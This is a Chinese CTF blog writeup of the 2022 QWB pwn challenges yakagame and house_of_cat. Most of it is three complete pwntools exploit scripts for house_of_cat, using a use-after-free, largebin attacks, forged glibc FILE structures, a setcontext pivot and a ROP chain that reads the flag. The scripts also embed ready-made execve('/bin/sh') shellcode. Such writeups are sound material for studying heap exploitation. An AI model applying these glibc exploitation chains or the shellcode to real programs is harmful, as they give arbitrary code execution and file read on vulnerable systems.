---
title: 2022 强网杯 pwn Writeup
date: 2022-08-01 12:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=39/
pin: false
published:
---

## yakagame

漏洞点在这里下标用的char类型，存在负数越界。

![img](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/GNWP~E9P0BDXRCSVEA$U99L.png)

![image-20220801214728363](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220801214728363.png)

题目会比对函数名，比对不上第一次会进行注册函数，第二次就可以调用该函数

该函数的注册序号num决定了它可以往weaponlist+num写入数据，这里负数越界后，就可以直接去改score，进入后门，其中后门system的参数地址是存放在cmd变量中，通过越界修改地址为opt里的sh字段。

![image-20220801215430105](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220801215430105.png)

## house of cat 

![image-20220802092823054](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220802092823054.png)

![image-20220802175119988](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220802175119988.png)

漏洞点在于UAF

![image-20220802175133417](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220802175133417.png)

### 方法一

逆向输入以后就是一个常规堆题，这题可以用houseofemma来做，一开始也想到了，但是始终没想到怎么改topchunksize，对UAF堆布局还是不够熟练吧

题目只给了2次edit，一次largebinattack改guard，一次largbinsttack改stderr同时改topchunkszie

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level='debug'
context(os="linux",arch="amd64")

p = process("house_of_cat")
elf = ELF("house_of_cat")
libc = elf.libc

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def login():
    sa("mew mew mew~~~~~~",'LOGIN | r00t QWB QWXFadmin')

def game():
    sa("mew mew mew~~~~~~",'CAT | r00t QWB QWXF'+'\xff'+'$')

def add(idx,size,con='a'):
    game()
    sla("plz input your cat choice:",1)
    sla("plz input your cat idx:",idx)
    sla("plz input your cat size:",size)
    p.sendafter("plz input your content:",con)

def dele(idx):
    game()
    sla("plz input your cat choice:",2)
    sla("plz input your cat idx:",idx)

def show(idx):
    game()
    sla("plz input your cat choice:",3)
    sla("plz input your cat idx:",idx)

def edit(idx,con):
    game()
    sla("plz input your cat choice:",4)
    sla("plz input your cat idx:",idx)
    p.sendafter("plz input your content:",con)

def ROL(content, key):
	tmp = bin(content)[2:].rjust(64, '0')
	return int(tmp[key:] + tmp[:key], 2)


login()

add(0,0x418)
add(1,0x418)

dele(0)
show(0)
large_mainarena = uu64()
libc_base = large_mainarena-0x219ce0
lg('libc_base')

magic = libc_base + 0x00000000001675b0
setcontext = libc_base + libc.sym['setcontext'] + 61
Open = libc_base + libc.sym["open"]
Read = libc_base + libc.sym["read"]
Write = libc_base + libc.sym['write']
Close = libc_base + libc.sym['close']
stderr = libc_base + libc.sym['stderr']
guard = libc_base - 0x002890
IO_cookie_jumps = libc_base + 0x215b80
pop_rdi = 0x000000000002a3e5 + libc_base
pop_rsi = 0x000000000002be51 + libc_base
pop_rdx_rbx = 0x0000000000090529 + libc_base
pop_rax = 0x0000000000045eb0+libc_base
syscall = 0x0000000000091396+libc_base

lg('guard')

add(2,0x418)# 2-0
add(3,0x420)
add(4,0x418)

dele(3)
add(5,0x430)
# add(6,0x450)
# add(7,0x430)
dele(0)

edit(3,p64(libc_base+0x21a0d0)*2+p64(0)+p64(guard-0x20))
add(6,0x440)
show(3)
p.recvuntil("Context:\n")
heap_base = u64(p.recv(6).ljust(8,'\x00'))-0x290
lg('heap_base')
key = heap_base + 0x290

fake_frame_addr = heap_base+0x1cc0
frame = SigreturnFrame()
frame.rdi = fake_frame_addr + 0xF8# ./flag
frame.rsi = 0
frame.rdx = 0x100
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = pop_rdi + 1  # ret

rop = p64(pop_rdi)+p64(0)+p64(Close)
rop += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(fake_frame_addr+0xF8)+p64(syscall)
rop += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(fake_frame_addr+0x200)+p64(Read)
rop += p64(pop_rdi)+p64(1)+p64(Write)

next_chain = 0
fake_IO_FILE =  p64(0)*2
fake_IO_FILE += p64(0)  # _IO_write_base = 0
fake_IO_FILE += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0)  # _IO_buf_base
fake_IO_FILE += p64(0)  # _IO_buf_end
fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(next_chain)  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00')
fake_IO_FILE += p64(heap_base)  # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xB0, '\x00')
fake_IO_FILE += p64(0)  # _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xC8, '\x00')
fake_IO_FILE += p64(IO_cookie_jumps+0x40)  # vtable
fake_IO_FILE += p64(heap_base + 0x1cc0)  # rdi# payload
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(ROL(magic^key, 0x11))
payload = fake_IO_FILE.ljust(0x100,'\x00')
payload += p64(0) + p64(heap_base + 0x1cc0) + '\x00'*0x10 + p64(setcontext)
payload += str(frame).ljust(0xF8, '\x00')[0x28:]+'flag'.ljust(0x10, '\x00')+rop

add(7,0x440,payload)
#-------------------------UAF错位构造堆复用-------------------------------
add(8,0x430)
add(9,0x450)
add(10,0x440)

dele(8)
dele(9)

add(11,0x430+0x30,'a'*0x430+p64(0)+p64(0x461))
add(12,0x450-0x30)

dele(9)
add(13,0x450,'a'*0x20+p64(0)+p64(0xcf1))

dele(9)
add(14,0x460)

dele(7)
dele(12)
edit(9,p64(libc_base+0x21a0e0)*2+p64(0)+p64(stderr-0x20)+p64(0)+p64(0))# topchunksize

game()
sla("plz input your cat choice:",1)
sla("plz input your cat idx:",15)
sla("plz input your cat size:",0x468)

p.interactive()
```

### 方法二

也可以用house of cat 来做

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("","")
p = process("./house_of_cat")
elf = ELF("./house_of_cat")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

def login():
    sa("mew mew mew~~~~~~",'LOGIN | r00t QWB QWXFadmin')

def game():
    sa("mew mew mew~~~~~~",'CAT | r00t QWB QWXF'+'\xff'+'$')

def add(idx,size,con='a'):
    game()
    sla("plz input your cat choice:",1)
    sla("plz input your cat idx:",idx)
    sla("plz input your cat size:",size)
    p.sendafter("plz input your content:",con)

def dele(idx):
    game()
    sla("plz input your cat choice:",2)
    sla("plz input your cat idx:",idx)

def show(idx):
    game()
    sla("plz input your cat choice:",3)
    sla("plz input your cat idx:",idx)

def edit(idx,con):
    game()
    sla("plz input your cat choice:",4)
    sla("plz input your cat idx:",idx)
    p.sendafter("plz input your content:",con)


login()
add(0,0x420)
add(1,0x418)
add(2,0x418)

dele(0)
add(3,0x430)
show(0)
libc_base = l64()-0x21A0D0
lg('libc_base')
main_arena = libc_base+0x21A0D0
p.recv(10)
heap_base=u64(p.recv(6).ljust(8,'\x00'))-0x290
lg('heap_base')
#---------------------------------------------------------
setcontext = libc_base + libc.sym['setcontext'] + 61
Open = libc_base + libc.sym["open"]
Read = libc_base + libc.sym["read"]
Write = libc_base + libc.sym['write']
stderr = libc_base + libc.sym['stderr']
Close = libc_base + libc.sym['close']
IO_wfile_jumps = libc_base + 0x2160c0
lg('Open')
lg('IO_wfile_jumps')


pop_rdi = libc_base + 0x000000000002a3e5
pop_rsi = libc_base + 0x000000000002be51
pop_rdx_rbx = libc_base + 0x0000000000090529 
pop_rax = libc_base + 0x0000000000045eb0
syscall = libc_base + 0x0000000000091396
ret= libc_base + 0x0000000000029cd6




orw_addr = heap_base+0x17b0
fake_io_addr = heap_base+0xae0  # 伪造的fake_IO结构体的地址
flag = fake_io_addr+0x160

next_chain = 0
fake_IO_FILE  = p64(0xfbad1800) + p64(0) # _flag = '/bin/sh'/rdi
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(1)+p64(2)
fake_IO_FILE += p64(fake_io_addr+0xb0) # _IO_backup_base = setcontext_rdx/rdx
fake_IO_FILE += p64(setcontext) # _IO_save_end = call addr(call setcontext)
fake_IO_FILE =  fake_IO_FILE.ljust(0x68, '\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE =  fake_IO_FILE.ljust(0x88, '\x00')
fake_IO_FILE += p64(heap_base) # _lock = a writable address
fake_IO_FILE =  fake_IO_FILE.ljust(0xa0, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30) #_wide_data,rax1_addr
fake_IO_FILE =  fake_IO_FILE.ljust(0xc0, '\x00')
fake_IO_FILE += p64(1) # _mode = 1
fake_IO_FILE =  fake_IO_FILE.ljust(0xd8, '\x00')
fake_IO_FILE += p64(IO_wfile_jumps+0x10)  # vtable
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr

fake_IO_FILE =  fake_IO_FILE.ljust(0x150,'\x00')
fake_IO_FILE += p64(orw_addr)+p64(ret)# fake_io_addr+0xb0+0xa0/0xa8
fake_IO_FILE += '/flag'.ljust(0x10, '\x00')

dele(2)# 因为题目只能edit 0x30/所以要重新申请
add(5,0x418,fake_IO_FILE[0x10:])

dele(2)
edit(0,p64(main_arena)*2+p64(0)+p64(stderr-0x20))
add(4,0x450)
#----------------------------------------------
orw =  p64(pop_rdi)+p64(0)+p64(Close)# 限制了read的fd为0
orw += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(flag)+p64(pop_rsi)+p64(0)+p64(syscall)
orw += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(fake_io_addr+0x200)+p64(pop_rdx_rbx)+p64(0x30)+p64(0)+p64(Read)
orw += p64(pop_rdi)+p64(1)+p64(Write)
add(6,0x450,orw)

# Largebinattack改topchunk位为小值
add(7,0x440)
add(8,0x430)
add(9,0x430)
dele(7)
add(10,0x450)
dele(9)
edit(7,p64(libc_base+0x21a0e0)*2+p64(0)+p64(heap_base+0x2d30+3-0x20))
game()
sla("plz input your cat choice:",1)
sla("plz input your cat idx:",15)
# dbg()
sla("plz input your cat size:",0x468)# Largebinattack 和 __malloc_assert

p.interactive()
```

### 方法三

在houseofcat的基础上加上用堆复用修改topchunksize，就实现了用一次largbinattack攻击无exit场景下的pwn题

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level='debug'
context(os="linux",arch="amd64")

p = process("house_of_cat")
elf = ELF("house_of_cat")
libc = elf.libc

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def login():
    sa("mew mew mew~~~~~~",'LOGIN | r00t QWB QWXFadmin')

def game():
    sa("mew mew mew~~~~~~",'CAT | r00t QWB QWXF'+'\xff'+'$')

def add(idx,size,con='a'):
    game()
    sla("plz input your cat choice:",1)
    sla("plz input your cat idx:",idx)
    sla("plz input your cat size:",size)
    p.sendafter("plz input your content:",con)

def dele(idx):
    game()
    sla("plz input your cat choice:",2)
    sla("plz input your cat idx:",idx)

def show(idx):
    game()
    sla("plz input your cat choice:",3)
    sla("plz input your cat idx:",idx)

def edit(idx,con):
    game()
    sla("plz input your cat choice:",4)
    sla("plz input your cat idx:",idx)
    p.sendafter("plz input your content:",con)


login()

add(0,0x440)
add(1,0x440)

dele(0)
add(2,0x450)
show(0)
libc_base = uu64()-0x21a0e0
lg('libc_base')
p.recv(10)
heap_base=u64(p.recv(6).ljust(8,'\x00'))-0x290
lg('heap_base')

setcontext = libc_base + libc.sym['setcontext'] + 61
Open = libc_base + libc.sym["open"]
Read = libc_base + libc.sym["read"]
Write = libc_base + libc.sym['write']
Close = libc_base + libc.sym['close']
stderr = libc_base + libc.sym['stderr']

IO_wfile_jumps = libc_base + 0x2160c0
pop_rdi = 0x000000000002a3e5 + libc_base
pop_rsi = 0x000000000002be51 + libc_base
pop_rdx_rbx = 0x0000000000090529 + libc_base
pop_rax = 0x0000000000045eb0+libc_base
syscall = 0x0000000000091396+libc_base
ret= 0x0000000000029cd6+libc_base
#---------------------------------------------------------
flag = heap_base+0x3a8
fake_io_addr = heap_base+0x290
next_chain = 0
fake_IO_FILE =  p64(0)*6
fake_IO_FILE += p64(1)+p64(0)
fake_IO_FILE += p64(fake_io_addr+0xb0) #_IO_backup_base=setcontext_rdx
fake_IO_FILE += p64(setcontext) #_IO_save_end=call addr(call setcontext)
fake_IO_FILE =  fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE =  fake_IO_FILE.ljust(0x78, '\x00')
fake_IO_FILE += p64(heap_base) # _lock = a writable address
fake_IO_FILE =  fake_IO_FILE.ljust(0x90, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30) #_wide_data,rax1_addr
fake_IO_FILE =  fake_IO_FILE.ljust(0xB0, '\x00')
fake_IO_FILE += p64(0) # _mode = 0
fake_IO_FILE =  fake_IO_FILE.ljust(0xC8, '\x00')
fake_IO_FILE += p64(IO_wfile_jumps+0x10)  # vtable
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr

payload = fake_IO_FILE.ljust(0x100,'\x00')
payload +='flag'.ljust(0x10, '\x00')+p64(0)*5+p64(heap_base+0x1840)+p64(ret)# + 0xa0/0xa8

rop =  p64(pop_rdi)+p64(0)+p64(Close)
rop += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(flag)+p64(pop_rsi)+p64(0)+p64(syscall)
rop += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(fake_io_addr+0x200)+p64(pop_rdx_rbx)+p64(0x30)*2+p64(Read)
rop += p64(pop_rdi)+p64(1)+p64(Write)

add(3,0x440,payload)# 3-0
add(4,0x430)
add(5,0x450)
add(6,0x440,rop)
dele(4)
dele(5)

add(7,0x430+0x30,'a'*0x430+p64(0)+p64(0x461))
add(8,0x450-0x30)

dele(5)
add(9,0x450,'a'*0x20+p64(0)+p64(0xcf1))# 9-3

#----------------------largebin attack stderr------------------------
dele(5)
add(10,0x460)
dele(0)
dele(8)

edit(5,p64(libc_base+0x21a0e0)*2+p64(0)+p64(stderr-0x20)+p64(0)+p64(0))
game()
sla("plz input your cat choice:",1)
sla("plz input your cat idx:",15)
sla("plz input your cat size:",0x468)

p.interactive()
```

## qwarmup

[从qwarmup中学习到关于lazybind和linkmap的利用技巧](https://blog.e4l4.com/posts/qwarmup/)

